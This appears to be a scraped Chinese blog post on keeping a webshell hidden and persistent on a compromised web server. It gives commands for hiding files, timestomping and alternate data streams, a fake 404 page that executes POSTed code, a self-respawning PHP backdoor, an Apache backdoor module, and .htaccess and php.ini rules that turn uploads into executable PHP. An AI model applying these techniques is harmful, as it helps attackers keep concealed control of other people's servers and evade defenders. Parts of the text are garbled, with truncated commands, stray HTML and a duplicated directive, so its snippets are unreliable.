前言
如果想让自己的Webshell留的更久一些,除了Webshell要免杀,还需要注意一些隐藏技巧,比如隐藏文件,修改时间属性,隐藏文件内容等。
1、隐藏文件
使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。
attrib +s +a +h +r shell.php //隐藏shell.php文件
2、修改文件时间属性
当你试图在一堆文件中隐藏自己新创建的文件,那么,除了创建一个迷惑性的文件名,还需要修改文件的修改日期。
//修改时间修改 Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12" //访问时间修改 Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12" //创建时间修改 Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
使用命令获取文件属性
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
修改某个文件夹下所有文件的创建和修改时间
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3、利用ADS隐藏文件内容
在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<"htmlcode"><"color: #ff0000">4、不死马不死马会删除自身,以进程的形式循环创建隐蔽的后门。
<"color: #ff0000">5、中间件后门将编译好的so文件复制到modules文件夹,启动后门模块,重启Apache。当发送特定参数的字符串过去时,即可触发后门。
github项目地址:
https://github.com/VladRico/apache2_BackdoorMod
6、利用404页面隐藏后门
404页面主要用来提升用户体验,可用来隐藏后门文件。
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <"/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); "color: #ff0000">7、利用 .htaccess 文件构成PHP后门一般.htaccess可以用来留后门和针对黑名单绕过,在上传目录创建.htaccess 文件写入,无需重启即可生效,上传png文件解析。
AddType application/x-httpd-php .png另外,在.htaccess 加入php解析规则,把文件名包含1的解析成php,上传1.txt即可解析。
<FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>8、利用 php.ini 隐藏后门文件
php.ini 中可以指定在主文件执行前后自动解析的文件名称,常用于页面公共头部和尾部,也可以用来隐藏php后门。
;在PHP文档之前自动添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文档之后自动添加文件。
auto_prepend_file = "c:\tmp.txt"需重启服务生效,访问任意一个php文件即可获取webshell。
总结
明霞山资源网 Design By www.htccd.com
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com